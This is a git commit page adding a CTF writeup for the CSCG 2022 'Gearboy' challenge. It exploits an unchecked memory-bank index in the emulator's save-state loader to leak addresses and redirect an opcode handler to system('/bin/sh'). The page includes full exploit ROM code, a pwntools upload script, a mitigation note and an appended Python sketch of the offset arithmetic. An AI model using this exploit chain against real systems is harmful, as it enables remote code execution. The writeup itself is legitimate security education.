cscg22-gearboy

CSCG 2022 Challenge 'Gearboy'
git clone https://git.sinitax.com/sinitax/cscg22-gearboy

commit 39bd35bbda75de0896245af60976b7e616d82ef2
parent 1d4298becbb12324db19c6f8eb5a63d0a54c9c36
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu,  2 Jun 2022 15:10:42 +0200

Added writeup

Diffstat:
M main.c              |   3 ---
A writeup/Makefile    |   2 ++
A writeup/document.md | 197 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A writeup/writeup.pdf |   0
4 files changed, 199 insertions(+), 3 deletions(-)

diff --git a/main.c b/main.c
@@ -32,9 +32,6 @@ main(void)
 
 	libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;
 
-	// target = libc + 0xe3afe;
-	// *(uint64_t*)free_got_gb = target;
-
 	target = libc + 0x52290;
 	strcpy((char*)processor_gb, "/bin/sh");
 	*(uint64_t*)(processor_gb+0x10*0x10) = target;
diff --git a/writeup/Makefile b/writeup/Makefile
@@ -0,0 +1,2 @@
+writeup.pdf: document.md
+	pandoc -o $@ $<
diff --git a/writeup/document.md b/writeup/document.md
@@ -0,0 +1,197 @@
+---
+documentclass: extarticle
+geometry: margin=2cm
+title: Gearboy Writeup
+author: sinitax
+fontsize: 12pt
+---
+
+## Exploit
+
+The task is to gain remote code execution (at least to the point of
+reading the contents of the flag file) by manipulating only a gameboy
+ROM and state file, which will be run on the server using a modified,
+headless version of [*Gearboy*](https://github.com/drhelius/Gearboy),
+a gameboy emulator.
+
+My immediate suspicion was missing checks on the state file rather than
+the ROM, because the state can be saved at any time and it's generally
+easier to forget a check before every use than a single check upon
+loading the ROM.
+
+By inspecting the source code for `GearboyCore::LoadState` we find the
+functionality of the emulator split into many different classes with
+a `LoadState` for each, e.g. `Processor::LoadState` and `Memory::LoadState`.
+
+`Memory::LoadState` loads, among other things, various memory bank buffers
+as well as values which control which of those banks are selected. Since
+the address space of the gameboy is limited (16-bit address space), parts
+of the memory must be swapped out to facilitate access to larger amounts.
+Oftentimes an index is used to indicate which memory bank is in use,
+as is the case with `WRAM1`:
+
+```
+u8* Memory::GetWRAM1()
+{
+    return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000;
+}
+```
+
+As long as `m_bCGB` (a flag enabling gameboy color mode) is set, the
+backing buffer of `WRAM1` will be chosen from a bank in `m_pWRAMBanks`.
+The value of `m_bCGB` is determined by special-purpose bytes in the
+ROM, which we control.
+
+Since `m_iCurrentWRAMBank` is loaded as part of the state and its value
+is not properly sanitized, modifying this value in the state file allows us to
+essentially mmap memory at a chosen `0x1000`-byte multiple from `m_pWRAMBanks`
+into the address space of our emulated game. When the running ROM reads from or
+writes to `0xD000-0xE000`, it will instead access the address we control.
+
+But where to write when ASLR is enabled?
+
+To get around ASLR we need to find objects on the heap with consistent
+offsets to the `WRAM` bank buffer `m_pWRAMBanks`. We can do this by
+running `gdbserver` in the docker container and observing the surrounding
+memory and pointers of objects allocated shortly before or after it. The
+fact that each session is a freshly spawned docker container helps
+with consistency.
+
+Doing this we find a heap configuration which is consistent on every first
+run in the docker container: the address of the `Processor` object is
+at an offset of `-0x126a0` from `m_pWRAMBanks` and the `Memory` object
+is at an offset of `-0xd0` from the `Processor` object. By setting the
+`m_iCurrentWRAMBank` value to `-0x13` in the state file we will be able
+to access the `Processor` object at `0x13000-0x126a0+0xD000=0xD960`
+and the `Memory` object at `0x13000-0x12770+0xD000=0xD890`.
+
+For every instruction, the processor resolves the function for handling
+an opcode by looking it up in a table using the opcode as an index. This
+`opcodeTable` is a member of the `Processor` object and as such stored
+on the heap. By reading one of these function pointers and subtracting
+its offset in the binary we can recover the base address at which the
+Gearboy emulator is loaded.
+
+Now that we know the base address, and as a result the address of the
+GOT, the natural next step would be to leak libc by reading the GOT,
+calculate the address of `system` and overwrite a function pointer
+to call `system`. The only problem is, we are still just a ROM in
+an emulator and only have access to the memory mapped into `0xD000-0xE000`.
+
+We need to look for another access primitive.
+
+This time, however, we are not limited to our state and ROM file contents.
+We can manipulate the `Memory` and `Processor` objects directly!
+
+Looking through the source code again we find a good candidate:
+
+```
+u8* Memory::GetVRAM()
+{
+    if (m_bCGB)
+        return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000;
+    else
+        return m_pMap + 0x8000;
+}
+```
+
+We have already set `m_bCGB` and `m_iCurrentLCDRAMBank` is loaded from the
+state file. As such, we can make accesses to `0x8000-0x9000` be backed by the
+`m_pLCDRAMBank1` buffer, whose pointer we control.
+
+We set `m_pLCDRAMBank1` in the `Memory` object to point to the target GOT
+address of `free`, which is calculated using the base address. We can then
+read the `free` address from `0x8000`, leak the libc base and calculate
+the `system` address.
+
+To finally call `system`, we overwrite a function pointer in
+`Processor::opcodeTable` and call the corresponding opcode.
+We ensure the first argument to `system` points to the string **/bin/sh**
+by writing it to the address of the `Processor` object, as this is the address
+in `rdi` (the handler's `this` pointer) when `system` is called. Since
+`opcodeTable` is the first member in `Processor` we need to choose an opcode
+to call which does not conflict with the space used for the string and also
+is not called before the value can be fully written (as is the case with the
+load instructions). The `stop` instruction (value `0x10`) is a good fit here.
+
+### Mitigation
+
+This attack can be mitigated by performing better input sanitization
+when loading values from the state file. This would have prevented the
+initial out-of-bounds read / write and as such the subsequent RCE.
+This can be implemented for `m_iCurrentWRAMBank` as a simple range check.
+
+\newpage
+
+**ROM Code (compiled using GBDK):**\footnote{https://github.com/gbdk-2020/gbdk-2020/}
+
+```C
+#include "stdint.h"
+#include "string.h"
+
+void
+main(void)
+{
+	volatile static uint8_t *processor_gb;
+	volatile static uint8_t *memory_gb;
+	volatile static uint8_t *free_got_gb;
+	volatile static uint64_t op0x00;
+	volatile static uint64_t base;
+	volatile static uint64_t libc;
+	volatile static uint64_t free_got;
+	volatile static uint64_t target;
+
+	/* WRAM BANK = -0x13 */
+	processor_gb = (void*) 0xD960;
+	memory_gb = processor_gb - 0xd0;
+
+	/* get base from op0x00 */
+	op0x00 = *(uint64_t*)processor_gb;
+	base = op0x00 - 0x1d420;
+	free_got = base + 0x4ad78;
+
+	/* change lcdrambank pointer to access got */
+	*(uint64_t*)(memory_gb+0x90) = free_got;
+	free_got_gb = (void*) 0x8000;
+
+	libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;
+
+	target = libc + 0x52290;
+	strcpy((char*)processor_gb, "/bin/sh");
+	*(uint64_t*)(processor_gb+0x10*0x10) = target;
+
+	__asm \
+		stop \
+	__endasm;
+
+	while (1);
+}
+```
+
+\newpage
+
+**Upload and state modification script:**
+
+```python
+from base64 import b64encode
+from sys import argv,exit
+from pwn import *
+
+rom = list(open("main.gb", "rb").read())
+state = list(open("main.state", "rb").read())
+
+# set m_iCurrentWRAMBank
+for i,v in enumerate(struct.pack("<i", -0x13)):
+    state[0x10000+i] = v
+
+# set m_iCurrentLCDRAMBank
+for i,v in enumerate(struct.pack("<i", 1)):
+    state[0x10004+i] = v
+
+io = process(argv[1:])
+
+io.sendline(b64encode(bytes(rom)))
+io.sendline(b64encode(bytes(state)))
+
+io.interactive()
+```
diff --git a/writeup/writeup.pdf b/writeup/writeup.pdf
Binary files differ.
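
The bank index and the emulated addresses quoted in the writeup (`-0x13`, `0xD960`, `0xD890`) can be re-derived with a short Python sketch. It is only a model of the arithmetic in `Memory::GetWRAM1`, assuming the heap offsets reported in the writeup; the helper names `bank_for` and `gb_address` are hypothetical and do not appear in Gearboy or in the exploit.

```python
# Model of the WRAM1 window arithmetic described in the writeup.
# All offsets are taken from the writeup; helper names are hypothetical.

WRAM1_BASE = 0xD000   # start of the switchable WRAM window in the emulated address space
BANK_SIZE = 0x1000    # GetWRAM1() advances 0x1000 bytes per bank index

# Host-side offsets relative to m_pWRAMBanks, as observed in the writeup.
PROCESSOR_OFFSET = -0x126A0
MEMORY_OFFSET = PROCESSOR_OFFSET - 0xD0   # Memory lies 0xd0 below Processor


def bank_for(host_offset: int) -> int:
    """Return the bank index whose 0x1000-byte window contains host_offset."""
    # Floor division rounds toward negative infinity, which is what we
    # want for offsets below m_pWRAMBanks.
    return host_offset // BANK_SIZE


def gb_address(host_offset: int, bank: int) -> int:
    """Return the emulated address that reaches host_offset for a given bank."""
    delta = host_offset - BANK_SIZE * bank
    if not 0 <= delta < BANK_SIZE:
        raise ValueError("offset is outside the window selected by this bank")
    return WRAM1_BASE + delta


if __name__ == "__main__":
    bank = bank_for(PROCESSOR_OFFSET)
    print(hex(bank))
    print(hex(gb_address(PROCESSOR_OFFSET, bank)))
    print(hex(gb_address(MEMORY_OFFSET, bank)))
```

Both objects fall inside the same `0x1000`-byte window, which is why a single bank value in the state file is enough to reach the `Processor` and the `Memory` object from the ROM.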